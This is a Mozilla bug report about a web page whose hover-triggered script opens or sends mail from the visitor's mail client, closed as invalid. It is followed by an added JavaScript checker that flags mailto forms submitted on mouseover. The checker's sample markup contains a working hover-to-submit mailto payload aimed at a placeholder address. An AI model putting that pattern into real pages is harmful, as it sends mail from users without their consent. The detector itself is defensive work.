Closed Bug 248920 Opened 20 years ago Closed 20 years ago

Cursor movement on Web Page starts Email Client

Categories

(Firefox :: General, defect)

x86
Windows 98
defect
Not set
normal

RESOLVED INVALID

People

(Reporter: DaveMcA, Assigned: bugs)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7) Gecko/20040614 Firefox/0.9

With Javascript enabled, passing cursor over line containing "Completely Safe
Link - Trust Me" will start email client - Eudora 4.3. Disabling Javascript
prevents program from starting.

Reproducible: Always
Steps to Reproduce:
1. Go to http://www.digicrime.com/noprivacy.html using Firefox/0.9 with
Javascript enabled.
2. Pass cursor over line (not necessarily the words) containing "Completely Safe
Link - Trust Me"


Actual Results:  
1) Message box came up stating "You probably just sent mail ..."
2) Email client started - Eudora 4.3 started with new mail addressed to
"mcc@digicrime.com" 

Expected Results:  
Nothing.

I do not believe the mail was actually sent but that may have been due to my
settings within Eudora.

Modern mail clients don't send mail immediately in response to mailto forms. 
They usually bring up a mail composition window, letting you inspect or modify
the message before sending it.
Group: security
Summary: Cursor movement on Web Page starts other programs (Email Client) → Cursor movement on Web Page starts Email Client
-> invalid
The page intends to demonstrate an old security flaw in Netscape, which doesn't
apply to us.
Severity: major → normal
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Component: Web Site → General
Resolution: --- → INVALID
*** Bug 294453 has been marked as a duplicate of this bug. ***
(In reply to comments #1 and #2)

>Modern mail clients don't send mail immediately in response to mailto forms. 
>They usually bring up a mail composition window, letting you inspect or modify
>the message before sending it.

Yes, that's how they're supposed to work, it should just display a blank message
and not send anything. When I tested it, Thunderbird opened up a blank
composition window but didn't send anything, so just to make sure, I switched the
default to Outlook Express and it did manage to somehow send a blank message to
the mailto link in the script. It may be because of my settings in Thunderbird
that it didn't send the message but I can't be too sure. 

> -> invalid
> The page intends to demonstrate an old security flaw in Netscape, which
>doesn't apply to us.

I partially disagree. Yes, it was originally a flaw in Netscape and that is
exactly what that page was meant to demonstrate, I'm not arguing that at all.
But, and correct me if I am wrong, I was/am under the assertion that any
vulnerability most certainly applies to us if it can be exploited on a
non-Netscape Mozilla build, which is Firefox in this case.
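
For anyone reviewing pages for the behaviour discussed in this bug (a mailto: form submitted by script on mouse movement rather than on a click), the following is an added example, not code from the bug report or from the demonstration page. It is a regex-based static check; the function names, the sample markup and the example.invalid addresses are constructed for illustration.

```javascript
// Added example: static triage for pages where a mailto: form can be
// submitted by script on a non-click event. Regex-based, not a full HTML parser.

// Constructed sample input (addresses are placeholders).
const SAMPLE_HTML = `
<form name="f" method="post" action="mailto:collector@example.invalid">
  <input type="hidden" name="note" value="hello">
</form>
<a href="#" onmouseover="document.f.submit()">Completely Safe Link - Trust Me</a>
<form action="/search"><input name="q"></form>
<a href="mailto:help@example.invalid" onmouseover="hint()">Contact</a>
`;

// Read one attribute value (double-quoted, single-quoted, or bare) from a tag.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function auditMailtoForms(html) {
  // Forms whose action uses the mailto: scheme.
  const forms = [...html.matchAll(/<form\b[^>]*>/gi)]
    .map(m => attr(m[0], 'action'))
    .filter(action => action && /^\s*mailto:/i.test(action));
  if (forms.length === 0) return [];

  // Inline handlers other than onclick/onsubmit whose code calls submit().
  const handlers = [];
  const handlerRe = /\b(on(?!click|submit)[a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  for (const tag of html.matchAll(/<[a-z][^>]*>/gi)) {
    for (const h of tag[0].matchAll(handlerRe)) {
      const code = h[2] ?? h[3];
      if (/\.submit\s*\(/.test(code)) handlers.push({ event: h[1].toLowerCase(), code });
    }
  }

  // Pair every mailto form with every auto-submitting handler for manual review.
  return forms.flatMap(action => handlers.map(h => ({ action, ...h })));
}

console.log(auditMailtoForms(SAMPLE_HTML));
```

A plain mailto: link with a harmless hover handler and a non-mailto form are both ignored; only the combination of a mailto: form and a non-click handler calling submit() is reported.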